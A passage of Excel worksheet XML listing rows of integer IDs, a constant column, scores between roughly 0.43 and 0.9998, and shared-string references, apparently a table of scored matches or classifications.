    <row r="3050" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3050" s="1">
        <v>3048</v>
      </c>
      <c r="B3050">
        <v>5082</v>
      </c>
      <c r="C3050">
        <v>5082</v>
      </c>
      <c r="D3050">
        <v>2</v>
      </c>
      <c r="E3050">
        <v>0.99910002946853638</v>
      </c>
      <c r="F3050" t="s">
        <v>5592</v>
      </c>
      <c r="G3050" t="s">
        <v>6030</v>
      </c>
      <c r="H3050" t="s">
        <v>6031</v>
      </c>
    </row>
    <row r="3051" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3051" s="1">
        <v>3049</v>
      </c>
      <c r="B3051">
        <v>4557</v>
      </c>
      <c r="C3051">
        <v>4557</v>
      </c>
      <c r="D3051">
        <v>2</v>
      </c>
      <c r="E3051">
        <v>0.99769997596740723</v>
      </c>
      <c r="F3051" t="s">
        <v>5592</v>
      </c>
      <c r="G3051" t="s">
        <v>6032</v>
      </c>
      <c r="H3051" t="s">
        <v>6033</v>
      </c>
    </row>
    <row r="3052" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3052" s="1">
        <v>3050</v>
      </c>
      <c r="B3052">
        <v>5096</v>
      </c>
      <c r="C3052">
        <v>5096</v>
      </c>
      <c r="D3052">
        <v>2</v>
      </c>
      <c r="E3052">
        <v>0.9944000244140625</v>
      </c>
      <c r="F3052" t="s">
        <v>5592</v>
      </c>
      <c r="G3052" t="s">
        <v>6034</v>
      </c>
      <c r="H3052" t="s">
        <v>6035</v>
      </c>
    </row>
    <row r="3053" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3053" s="1">
        <v>3051</v>
      </c>
      <c r="B3053">
        <v>5094</v>
      </c>
      <c r="C3053">
        <v>5094</v>
      </c>
      <c r="D3053">
        <v>2</v>
      </c>
      <c r="E3053">
        <v>0.99910002946853638</v>
      </c>
      <c r="F3053" t="s">
        <v>5592</v>
      </c>
      <c r="G3053" t="s">
        <v>6036</v>
      </c>
      <c r="H3053" t="s">
        <v>6031</v>
      </c>
    </row>
    <row r="3054" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3054" s="1">
        <v>3052</v>
      </c>
      <c r="B3054">
        <v>4548</v>
      </c>
      <c r="C3054">
        <v>4548</v>
      </c>
      <c r="D3054">
        <v>2</v>
      </c>
      <c r="E3054">
        <v>0.99639999866485596</v>
      </c>
      <c r="F3054" t="s">
        <v>5592</v>
      </c>
      <c r="G3054" t="s">
        <v>6037</v>
      </c>
      <c r="H3054" t="s">
        <v>6038</v>
      </c>
    </row>
    <row r="3055" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3055" s="1">
        <v>3053</v>
      </c>
      <c r="B3055">
        <v>4549</v>
      </c>
      <c r="C3055">
        <v>4549</v>
      </c>
      <c r="D3055">
        <v>2</v>
      </c>
      <c r="E3055">
        <v>0.58069998025894165</v>
      </c>
      <c r="F3055" t="s">
        <v>5592</v>
      </c>
      <c r="G3055" t="s">
        <v>6039</v>
      </c>
      <c r="H3055" t="s">
        <v>6040</v>
      </c>
    </row>
    <row r="3056" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3056" s="1">
        <v>3054</v>
      </c>
      <c r="B3056">
        <v>4550</v>
      </c>
      <c r="C3056">
        <v>4550</v>
      </c>
      <c r="D3056">
        <v>2</v>
      </c>
      <c r="E3056">
        <v>0.94459998607635498</v>
      </c>
      <c r="F3056" t="s">
        <v>5592</v>
      </c>
      <c r="G3056" t="s">
        <v>6041</v>
      </c>
      <c r="H3056" t="s">
        <v>6042</v>
      </c>
    </row>
    <row r="3057" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3057" s="1">
        <v>3055</v>
      </c>
      <c r="B3057">
        <v>4551</v>
      </c>
      <c r="C3057">
        <v>4551</v>
      </c>
      <c r="D3057">
        <v>2</v>
      </c>
      <c r="E3057">
        <v>0.77149999141693115</v>
      </c>
      <c r="F3057" t="s">
        <v>5592</v>
      </c>
      <c r="G3057" t="s">
        <v>6043</v>
      </c>
      <c r="H3057" t="s">
        <v>6044</v>
      </c>
    </row>
    <row r="3058" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3058" s="1">
        <v>3056</v>
      </c>
      <c r="B3058">
        <v>5093</v>
      </c>
      <c r="C3058">
        <v>5093</v>
      </c>
      <c r="D3058">
        <v>2</v>
      </c>
      <c r="E3058">
        <v>0.99959999322891235</v>
      </c>
      <c r="F3058" t="s">
        <v>5592</v>
      </c>
      <c r="G3058" t="s">
        <v>6045</v>
      </c>
      <c r="H3058" t="s">
        <v>6046</v>
      </c>
    </row>
    <row r="3059" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3059" s="1">
        <v>3057</v>
      </c>
      <c r="B3059">
        <v>5061</v>
      </c>
      <c r="C3059">
        <v>5061</v>
      </c>
      <c r="D3059">
        <v>2</v>
      </c>
      <c r="E3059">
        <v>0.58240002393722534</v>
      </c>
      <c r="F3059" t="s">
        <v>5592</v>
      </c>
      <c r="G3059" t="s">
        <v>6047</v>
      </c>
      <c r="H3059" t="s">
        <v>6048</v>
      </c>
    </row>
    <row r="3060" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3060" s="1">
        <v>3058</v>
      </c>
      <c r="B3060">
        <v>5092</v>
      </c>
      <c r="C3060">
        <v>5092</v>
      </c>
      <c r="D3060">
        <v>2</v>
      </c>
      <c r="E3060">
        <v>0.45359998941421509</v>
      </c>
      <c r="F3060" t="s">
        <v>5592</v>
      </c>
      <c r="G3060" t="s">
        <v>6049</v>
      </c>
      <c r="H3060" t="s">
        <v>6050</v>
      </c>
    </row>
    <row r="3061" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3061" s="1">
        <v>3059</v>
      </c>
      <c r="B3061">
        <v>5090</v>
      </c>
      <c r="C3061">
        <v>5090</v>
      </c>
      <c r="D3061">
        <v>2</v>
      </c>
      <c r="E3061">
        <v>0.99889999628067017</v>
      </c>
      <c r="F3061" t="s">
        <v>5592</v>
      </c>
      <c r="G3061" t="s">
        <v>6051</v>
      </c>
      <c r="H3061" t="s">
        <v>6052</v>
      </c>
    </row>
    <row r="3062" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3062" s="1">
        <v>3060</v>
      </c>
      <c r="B3062">
        <v>5089</v>
      </c>
      <c r="C3062">
        <v>5089</v>
      </c>
      <c r="D3062">
        <v>2</v>
      </c>
      <c r="E3062">
        <v>0.58249998092651367</v>
      </c>
      <c r="F3062" t="s">
        <v>5592</v>
      </c>
      <c r="G3062" t="s">
        <v>6053</v>
      </c>
      <c r="H3062" t="s">
        <v>6054</v>
      </c>
    </row>
    <row r="3063" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3063" s="1">
        <v>3061</v>
      </c>
      <c r="B3063">
        <v>5088</v>
      </c>
      <c r="C3063">
        <v>5088</v>
      </c>
      <c r="D3063">
        <v>2</v>
      </c>
      <c r="E3063">
        <v>0.99970000982284546</v>
      </c>
      <c r="F3063" t="s">
        <v>5592</v>
      </c>
      <c r="G3063" t="s">
        <v>6055</v>
      </c>
      <c r="H3063" t="s">
        <v>6056</v>
      </c>
    </row>
    <row r="3064" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3064" s="1">
        <v>3062</v>
      </c>
      <c r="B3064">
        <v>5791</v>
      </c>
      <c r="C3064">
        <v>5791</v>
      </c>
      <c r="D3064">
        <v>2</v>
      </c>
      <c r="E3064">
        <v>0.75129997730255127</v>
      </c>
      <c r="F3064" t="s">
        <v>5592</v>
      </c>
      <c r="G3064" t="s">
        <v>6057</v>
      </c>
      <c r="H3064" t="s">
        <v>6058</v>
      </c>
    </row>
    <row r="3065" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3065" s="1">
        <v>3063</v>
      </c>
      <c r="B3065">
        <v>4555</v>
      </c>
      <c r="C3065">
        <v>4555</v>
      </c>
      <c r="D3065">
        <v>2</v>
      </c>
      <c r="E3065">
        <v>0.98189997673034668</v>
      </c>
      <c r="F3065" t="s">
        <v>5592</v>
      </c>
      <c r="G3065" t="s">
        <v>6059</v>
      </c>
      <c r="H3065" t="s">
        <v>6060</v>
      </c>
    </row>
    <row r="3066" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3066" s="1">
        <v>3064</v>
      </c>
      <c r="B3066">
        <v>5084</v>
      </c>
      <c r="C3066">
        <v>5084</v>
      </c>
      <c r="D3066">
        <v>2</v>
      </c>
      <c r="E3066">
        <v>0.95080000162124634</v>
      </c>
      <c r="F3066" t="s">
        <v>5592</v>
      </c>
      <c r="G3066" t="s">
        <v>6061</v>
      </c>
      <c r="H3066" t="s">
        <v>6062</v>
      </c>
    </row>
    <row r="3067" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3067" s="1">
        <v>3065</v>
      </c>
      <c r="B3067">
        <v>5083</v>
      </c>
      <c r="C3067">
        <v>5083</v>
      </c>
      <c r="D3067">
        <v>2</v>
      </c>
      <c r="E3067">
        <v>0.8726000189781189</v>
      </c>
      <c r="F3067" t="s">
        <v>5592</v>
      </c>
      <c r="G3067" t="s">
        <v>6063</v>
      </c>
      <c r="H3067" t="s">
        <v>6064</v>
      </c>
    </row>
    <row r="3068" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3068" s="1">
        <v>3066</v>
      </c>
      <c r="B3068">
        <v>5091</v>
      </c>
      <c r="C3068">
        <v>5091</v>
      </c>
      <c r="D3068">
        <v>2</v>
      </c>
      <c r="E3068">
        <v>0.99849998950958252</v>
      </c>
      <c r="F3068" t="s">
        <v>5592</v>
      </c>
      <c r="G3068" t="s">
        <v>6065</v>
      </c>
      <c r="H3068" t="s">
        <v>6066</v>
      </c>
    </row>
    <row r="3069" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3069" s="1">
        <v>3067</v>
      </c>
      <c r="B3069">
        <v>5097</v>
      </c>
      <c r="C3069">
        <v>5097</v>
      </c>
      <c r="D3069">
        <v>2</v>
      </c>
      <c r="E3069">
        <v>0.99980002641677856</v>
      </c>
      <c r="F3069" t="s">
        <v>5592</v>
      </c>
      <c r="G3069" t="s">
        <v>6067</v>
      </c>
      <c r="H3069" t="s">
        <v>6068</v>
      </c>
    </row>
    <row r="3070" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3070" s="1">
        <v>3068</v>
      </c>
      <c r="B3070">
        <v>4584</v>
      </c>
      <c r="C3070">
        <v>4584</v>
      </c>
      <c r="D3070">
        <v>2</v>
      </c>
      <c r="E3070">
        <v>0.8432999849319458</v>
      </c>
      <c r="F3070" t="s">
        <v>5592</v>
      </c>
      <c r="G3070" t="s">
        <v>6069</v>
      </c>
      <c r="H3070" t="s">
        <v>6070</v>
      </c>
    </row>
    <row r="3071" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3071" s="1">
        <v>3069</v>
      </c>
      <c r="B3071">
        <v>4585</v>
      </c>
      <c r="C3071">
        <v>4585</v>
      </c>
      <c r="D3071">
        <v>2</v>
      </c>
      <c r="E3071">
        <v>0.56279999017715454</v>
      </c>
      <c r="F3071" t="s">
        <v>5592</v>
      </c>
      <c r="G3071" t="s">
        <v>6071</v>
      </c>
      <c r="H3071" t="s">
        <v>6072</v>
      </c>
    </row>
    <row r="3072" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3072" s="1">
        <v>3070</v>
      </c>
      <c r="B3072">
        <v>4631</v>
      </c>
      <c r="C3072">
        <v>4631</v>
      </c>
      <c r="D3072">
        <v>2</v>
      </c>
      <c r="E3072">
        <v>0.52490001916885376</v>
      </c>
      <c r="F3072" t="s">
        <v>5592</v>
      </c>
      <c r="G3072" t="s">
        <v>6073</v>
      </c>
      <c r="H3072" t="s">
        <v>6074</v>
      </c>
    </row>
    <row r="3073" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3073" s="1">
        <v>3071</v>
      </c>
      <c r="B3073">
        <v>4632</v>
      </c>
      <c r="C3073">
        <v>4632</v>
      </c>
      <c r="D3073">
        <v>2</v>
      </c>
      <c r="E3073">
        <v>0.76349997520446777</v>
      </c>
      <c r="F3073" t="s">
        <v>5592</v>
      </c>
      <c r="G3073" t="s">
        <v>6075</v>
      </c>
      <c r="H3073" t="s">
        <v>6076</v>
      </c>
    </row>
    <row r="3074" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3074" s="1">
        <v>3072</v>
      </c>
      <c r="B3074">
        <v>5030</v>
      </c>
      <c r="C3074">
        <v>5030</v>
      </c>
      <c r="D3074">
        <v>2</v>
      </c>
      <c r="E3074">
        <v>0.82270002365112305</v>
      </c>
      <c r="F3074" t="s">
        <v>5592</v>
      </c>
      <c r="G3074" t="s">
        <v>6077</v>
      </c>
      <c r="H3074" t="s">
        <v>6078</v>
      </c>
    </row>
    <row r="3075" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3075" s="1">
        <v>3073</v>
      </c>
      <c r="B3075">
        <v>4633</v>
      </c>
      <c r="C3075">
        <v>4633</v>
      </c>
      <c r="D3075">
        <v>2</v>
      </c>
      <c r="E3075">
        <v>0.52389997243881226</v>
      </c>
      <c r="F3075" t="s">
        <v>5592</v>
      </c>
      <c r="G3075" t="s">
        <v>6079</v>
      </c>
      <c r="H3075" t="s">
        <v>6080</v>
      </c>
    </row>
    <row r="3076" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3076" s="1">
        <v>3074</v>
      </c>
      <c r="B3076">
        <v>5026</v>
      </c>
      <c r="C3076">
        <v>5026</v>
      </c>
      <c r="D3076">
        <v>2</v>
      </c>
      <c r="E3076">
        <v>0.50770002603530884</v>
      </c>
      <c r="F3076" t="s">
        <v>5592</v>
      </c>
      <c r="G3076" t="s">
        <v>6081</v>
      </c>
      <c r="H3076" t="s">
        <v>6082</v>
      </c>
    </row>
    <row r="3077" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3077" s="1">
        <v>3075</v>
      </c>
      <c r="B3077">
        <v>5025</v>
      </c>
      <c r="C3077">
        <v>5025</v>
      </c>
      <c r="D3077">
        <v>2</v>
      </c>
      <c r="E3077">
        <v>0.61229997873306274</v>
      </c>
      <c r="F3077" t="s">
        <v>5592</v>
      </c>
      <c r="G3077" t="s">
        <v>6083</v>
      </c>
      <c r="H3077" t="s">
        <v>6084</v>
      </c>
    </row>
    <row r="3078" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3078" s="1">
        <v>3076</v>
      </c>
      <c r="B3078">
        <v>4636</v>
      </c>
      <c r="C3078">
        <v>4636</v>
      </c>
      <c r="D3078">
        <v>2</v>
      </c>
      <c r="E3078">
        <v>0.9879000186920166</v>
      </c>
      <c r="F3078" t="s">
        <v>5592</v>
      </c>
      <c r="G3078" t="s">
        <v>6085</v>
      </c>
      <c r="H3078" t="s">
        <v>6086</v>
      </c>
    </row>
    <row r="3079" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3079" s="1">
        <v>3077</v>
      </c>
      <c r="B3079">
        <v>4637</v>
      </c>
      <c r="C3079">
        <v>4637</v>
      </c>
      <c r="D3079">
        <v>2</v>
      </c>
      <c r="E3079">
        <v>0.99449998140335083</v>
      </c>
      <c r="F3079" t="s">
        <v>5592</v>
      </c>
      <c r="G3079" t="s">
        <v>6087</v>
      </c>
      <c r="H3079" t="s">
        <v>6088</v>
      </c>
    </row>
    <row r="3080" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3080" s="1">
        <v>3078</v>
      </c>
      <c r="B3080">
        <v>5937</v>
      </c>
      <c r="C3080">
        <v>5937</v>
      </c>
      <c r="D3080">
        <v>2</v>
      </c>
      <c r="E3080">
        <v>0.9966999888420105</v>
      </c>
      <c r="F3080" t="s">
        <v>5592</v>
      </c>
      <c r="G3080" t="s">
        <v>6089</v>
      </c>
      <c r="H3080" t="s">
        <v>6090</v>
      </c>
    </row>
    <row r="3081" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3081" s="1">
        <v>3079</v>
      </c>
      <c r="B3081">
        <v>5936</v>
      </c>
      <c r="C3081">
        <v>5936</v>
      </c>
      <c r="D3081">
        <v>2</v>
      </c>
      <c r="E3081">
        <v>0.99940001964569092</v>
      </c>
      <c r="F3081" t="s">
        <v>5592</v>
      </c>
      <c r="G3081" t="s">
        <v>6091</v>
      </c>
      <c r="H3081" t="s">
        <v>6092</v>
      </c>
    </row>
    <row r="3082" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3082" s="1">
        <v>3080</v>
      </c>
      <c r="B3082">
        <v>4640</v>
      </c>
      <c r="C3082">
        <v>4640</v>
      </c>
      <c r="D3082">
        <v>2</v>
      </c>
      <c r="E3082">
        <v>0.55500000715255737</v>
      </c>
      <c r="F3082" t="s">
        <v>5592</v>
      </c>
      <c r="G3082" t="s">
        <v>6093</v>
      </c>
      <c r="H3082" t="s">
        <v>6094</v>
      </c>
    </row>
    <row r="3083" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3083" s="1">
        <v>3081</v>
      </c>
      <c r="B3083">
        <v>5023</v>
      </c>
      <c r="C3083">
        <v>5023</v>
      </c>
      <c r="D3083">
        <v>2</v>
      </c>
      <c r="E3083">
        <v>0.91409999132156372</v>
      </c>
      <c r="F3083" t="s">
        <v>5592</v>
      </c>
      <c r="G3083" t="s">
        <v>6095</v>
      </c>
      <c r="H3083" t="s">
        <v>6096</v>
      </c>
    </row>
    <row r="3084" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3084" s="1">
        <v>3082</v>
      </c>
      <c r="B3084">
        <v>4645</v>
      </c>
      <c r="C3084">
        <v>4645</v>
      </c>
      <c r="D3084">
        <v>2</v>
      </c>
      <c r="E3084">
        <v>0.43279999494552612</v>
      </c>
      <c r="F3084" t="s">
        <v>5592</v>
      </c>
      <c r="G3084" t="s">
        <v>6097</v>
      </c>
      <c r="H3084" t="s">
        <v>6098</v>
      </c>
    </row>
    <row r="3085" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3085" s="1">
        <v>3083</v>
      </c>
      <c r="B3085">
        <v>5802</v>
      </c>
      <c r="C3085">
        <v>5802</v>
      </c>
      <c r="D3085">
        <v>2</v>
      </c>
      <c r="E3085">
        <v>0.87529999017715454</v>
      </c>
      <c r="F3085" t="s">
        <v>5592</v>
      </c>
      <c r="G3085" t="s">
        <v>6099</v>
      </c>
      <c r="H3085" t="s">
        <v>6100</v>
      </c>
    </row>
    <row r="3086" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3086" s="1">
        <v>3084</v>
      </c>
      <c r="B3086">
        <v>4649</v>
      </c>
      <c r="C3086">
        <v>4649</v>
      </c>
      <c r="D3086">
        <v>2</v>
      </c>
      <c r="E3086">
        <v>0.69870001077651978</v>
      </c>
      <c r="F3086" t="s">
        <v>5592</v>
      </c>
      <c r="G3086" t="s">
        <v>6101</v>
      </c>
      <c r="H3086" t="s">
        <v>6102</v>
      </c>
    </row>
    <row r="3087" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3087" s="1">
        <v>3085</v>
      </c>
      <c r="B3087">
        <v>5032</v>
      </c>
      <c r="C3087">
        <v>5032</v>
      </c>
      <c r="D3087">
        <v>2</v>
      </c>
      <c r="E3087">
        <v>0.53060001134872437</v>
      </c>
      <c r="F3087" t="s">
        <v>5592</v>
      </c>
      <c r="G3087" t="s">
        <v>6103</v>
      </c>
      <c r="H3087" t="s">
        <v>6104</v>
      </c>
    </row>
    <row r="3088" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3088" s="1">
        <v>3086</v>
      </c>
      <c r="B3088">
        <v>4629</v>
      </c>
      <c r="C3088">
        <v>4629</v>
      </c>
      <c r="D3088">
        <v>2</v>
      </c>
      <c r="E3088">
        <v>0.68320000171661377</v>
      </c>
      <c r="F3088" t="s">
        <v>5592</v>
      </c>
      <c r="G3088" t="s">
        <v>6105</v>
      </c>
      <c r="H3088" t="s">
        <v>6106</v>
      </c>
    </row>
    <row r="3089" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3089" s="1">
        <v>3087</v>
      </c>
      <c r="B3089">
        <v>4628</v>
      </c>
      <c r="C3089">
        <v>4628</v>
      </c>
      <c r="D3089">
        <v>2</v>
      </c>
      <c r="E3089">
        <v>0.77549999952316284</v>
      </c>
      <c r="F3089" t="s">
        <v>5592</v>
      </c>
      <c r="G3089" t="s">
        <v>6107</v>
      </c>
      <c r="H3089" t="s">
        <v>6108</v>
      </c>
    </row>
    <row r="3090" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3090" s="1">
        <v>3088</v>
      </c>
      <c r="B3090">
        <v>5942</v>
      </c>
      <c r="C3090">
        <v>5942</v>
      </c>
      <c r="D3090">
        <v>2</v>
      </c>
      <c r="E3090">
        <v>0.60329997539520264</v>
      </c>
      <c r="F3090" t="s">
        <v>5592</v>
      </c>
      <c r="G3090" t="s">
        <v>6109</v>
      </c>
      <c r="H3090" t="s">
        <v>6110</v>
      </c>
    </row>
    <row r="3091" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3091" s="1">
        <v>3089</v>
      </c>
      <c r="B3091">
        <v>4587</v>
      </c>
      <c r="C3091">
        <v>4587</v>
      </c>
      <c r="D3091">
        <v>2</v>
      </c>
      <c r="E3091">
        <v>0.767799973487854</v>
      </c>
      <c r="F3091" t="s">
        <v>5592</v>
      </c>
      <c r="G3091" t="s">
        <v>6111</v>
      </c>
      <c r="H3091" t="s">
        <v>6112</v>
      </c>
    </row>
    <row r="3092" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3092" s="1">
        <v>3090</v>
      </c>
      <c r="B3092">
        <v>5058</v>
      </c>
      <c r="C3092">
        <v>5058</v>
      </c>
      <c r="D3092">
        <v>2</v>
      </c>
      <c r="E3092">
        <v>0.80220001935958862</v>
      </c>
      <c r="F3092" t="s">
        <v>5592</v>
      </c>
      <c r="G3092" t="s">
        <v>6113</v>
      </c>
      <c r="H3092" t="s">
        <v>6114</v>
      </c>
    </row>
    <row r="3093" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3093" s="1">
        <v>3091</v>
      </c>
      <c r="B3093">
        <v>5057</v>
      </c>
      <c r="C3093">
        <v>5057</v>
      </c>
      <c r="D3093">
        <v>2</v>
      </c>
      <c r="E3093">
        <v>0.99910002946853638</v>
      </c>
      <c r="F3093" t="s">
        <v>5592</v>
      </c>
      <c r="G3093" t="s">
        <v>6115</v>
      </c>
      <c r="H3093" t="s">
        <v>6116</v>
      </c>
    </row>
    <row r="3094" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3094" s="1">
        <v>3092</v>
      </c>
      <c r="B3094">
        <v>5056</v>
      </c>
      <c r="C3094">
        <v>5056</v>
      </c>
      <c r="D3094">
        <v>2</v>
      </c>
      <c r="E3094">
        <v>0.9976000189781189</v>
      </c>
      <c r="F3094" t="s">
        <v>5592</v>
      </c>
      <c r="G3094" t="s">
        <v>6117</v>
      </c>
      <c r="H3094" t="s">
        <v>6118</v>
      </c>
    </row>
    <row r="3095" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3095" s="1">
        <v>3093</v>
      </c>
      <c r="B3095">
        <v>4591</v>
      </c>
      <c r="C3095">
        <v>4591</v>
      </c>
      <c r="D3095">
        <v>2</v>
      </c>
      <c r="E3095">
        <v>0.7281000018119812</v>
      </c>
      <c r="F3095" t="s">
        <v>5592</v>
      </c>
      <c r="G3095" t="s">
        <v>6119</v>
      </c>
      <c r="H3095" t="s">
        <v>6120</v>
      </c>
    </row>
    <row r="3096" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3096" s="1">
        <v>3094</v>
      </c>
      <c r="B3096">
        <v>4592</v>
      </c>
      <c r="C3096">
        <v>4592</v>
      </c>
      <c r="D3096">
        <v>2</v>
      </c>
      <c r="E3096">
        <v>0.56940001249313354</v>
      </c>
      <c r="F3096" t="s">
        <v>5592</v>
      </c>
      <c r="G3096" t="s">
        <v>6121</v>
      </c>
      <c r="H3096" t="s">
        <v>6122</v>
      </c>
    </row>
    <row r="3097" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3097" s="1">
        <v>3095</v>
      </c>
      <c r="B3097">
        <v>5053</v>
      </c>
      <c r="C3097">
        <v>5053</v>
      </c>
      <c r="D3097">
        <v>2</v>
      </c>
      <c r="E3097">
        <v>0.58550000190734863</v>
      </c>
      <c r="F3097" t="s">
        <v>5592</v>
      </c>
      <c r="G3097" t="s">
        <v>6123</v>
      </c>
      <c r="H3097" t="s">
        <v>6124</v>
      </c>
    </row>
    <row r="3098" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3098" s="1">
        <v>3096</v>
      </c>
      <c r="B3098">
        <v>5059</v>
      </c>
      <c r="C3098">
        <v>5059</v>
      </c>
      <c r="D3098">
        <v>2</v>
      </c>
      <c r="E3098">
        <v>0.65520000457763672</v>
      </c>
      <c r="F3098" t="s">
        <v>5592</v>
      </c>
      <c r="G3098" t="s">
        <v>6125</v>
      </c>
      <c r="H3098" t="s">
        <v>6126</v>
      </c>
    </row>
    <row r="3099" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3099" s="1">
        <v>3097</v>
      </c>
      <c r="B3099">
        <v>4599</v>
      </c>
      <c r="C3099">
        <v>4599</v>
      </c>
      <c r="D3099">
        <v>2</v>
      </c>
      <c r="E3099">
        <v>0.99949997663497925</v>
      </c>
      <c r="F3099" t="s">
        <v>5592</v>
      </c>
      <c r="G3099" t="s">
        <v>6127</v>
      </c>
      <c r="H3099" t="s">
        <v>6128</v>
      </c>
    </row>
    <row r="3100" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3100" s="1">
        <v>3098</v>
      </c>
      <c r="B3100">
        <v>5800</v>
      </c>
      <c r="C3100">
        <v>5800</v>
      </c>
      <c r="D3100">
        <v>2</v>
      </c>
      <c r="E3100">
        <v>0.91680002212524414</v>
      </c>
      <c r="F3100" t="s">
        <v>5592</v>
      </c>
      <c r="G3100" t="s">
        <v>6129</v>
      </c>
      <c r="H3100" t="s">
        <v>6130</v>
      </c>
    </row>
    <row r="3101" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3101" s="1">
        <v>3099</v>
      </c>
      <c r="B3101">
        <v>4603</v>
      </c>
      <c r="C3101">
        <v>4603</v>
      </c>
      <c r="D3101">
        <v>2</v>
      </c>
      <c r="E3101">
        <v>0.46610000729560852</v>
      </c>
      <c r="F3101" t="s">
        <v>5592</v>
      </c>
      <c r="G3101" t="s">
        <v>6131</v>
      </c>
      <c r="H3101" t="s">
        <v>6132</v>
      </c>
    </row>
    <row r="3102" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3102" s="1">
        <v>3100</v>
      </c>
      <c r="B3102">
        <v>4605</v>
      </c>
      <c r="C3102">
        <v>4605</v>
      </c>
      <c r="D3102">
        <v>2</v>
      </c>
      <c r="E3102">
        <v>0.99720001220703125</v>
      </c>
      <c r="F3102" t="s">
        <v>5592</v>
      </c>
      <c r="G3102" t="s">
        <v>6133</v>
      </c>
      <c r="H3102" t="s">
        <v>6134</v>
      </c>
    </row>
    <row r="3103" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3103" s="1">
        <v>3101</v>
      </c>
      <c r="B3103">
        <v>4608</v>
      </c>
      <c r="C3103">
        <v>4608</v>
      </c>
      <c r="D3103">
        <v>2</v>
      </c>
      <c r="E3103">
        <v>0.56470000743865967</v>
      </c>
      <c r="F3103" t="s">
        <v>5592</v>
      </c>
      <c r="G3103" t="s">
        <v>6135</v>
      </c>
      <c r="H3103" t="s">
        <v>6136</v>
      </c>
    </row>
    <row r="3104" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3104" s="1">
        <v>3102</v>
      </c>
      <c r="B3104">
        <v>5041</v>
      </c>
      <c r="C3104">
        <v>5041</v>
      </c>
      <c r="D3104">
        <v>2</v>
      </c>
      <c r="E3104">
        <v>0.82969999313354492</v>
      </c>
      <c r="F3104" t="s">
        <v>5592</v>
      </c>
      <c r="G3104" t="s">
        <v>6137</v>
      </c>
      <c r="H3104" t="s">
        <v>6138</v>
      </c>
    </row>
    <row r="3105" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3105" s="1">
        <v>3103</v>
      </c>
      <c r="B3105">
        <v>5037</v>
      </c>
      <c r="C3105">
        <v>5037</v>
      </c>
      <c r="D3105">
        <v>2</v>
      </c>
      <c r="E3105">
        <v>0.6096000075340271</v>
      </c>
      <c r="F3105" t="s">
        <v>5592</v>
      </c>
      <c r="G3105" t="s">
        <v>6139</v>
      </c>
      <c r="H3105" t="s">
        <v>6140</v>
      </c>
    </row>
    <row r="3106" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3106" s="1">
        <v>3104</v>
      </c>
      <c r="B3106">
        <v>4620</v>
      </c>
      <c r="C3106">
        <v>4620</v>
      </c>
      <c r="D3106">
        <v>2</v>
      </c>
      <c r="E3106">
        <v>0.99589997529983521</v>
      </c>
      <c r="F3106" t="s">
        <v>5592</v>
      </c>
      <c r="G3106" t="s">
        <v>6141</v>
      </c>
      <c r="H3106" t="s">
        <v>6142</v>
      </c>
    </row>
    <row r="3107" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3107" s="1">
        <v>3105</v>
      </c>
      <c r="B3107">
        <v>4600</v>
      </c>
      <c r="C3107">
        <v>4600</v>
      </c>
      <c r="D3107">
        <v>2</v>
      </c>
      <c r="E3107">
        <v>0.98760002851486206</v>
      </c>
      <c r="F3107" t="s">
        <v>5592</v>
      </c>
      <c r="G3107" t="s">
        <v>6143</v>
      </c>
      <c r="H3107" t="s">
        <v>6144</v>
      </c>
    </row>
    <row r="3108" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3108" s="1">
        <v>3106</v>
      </c>
      <c r="B3108">
        <v>4543</v>
      </c>
      <c r="C3108">
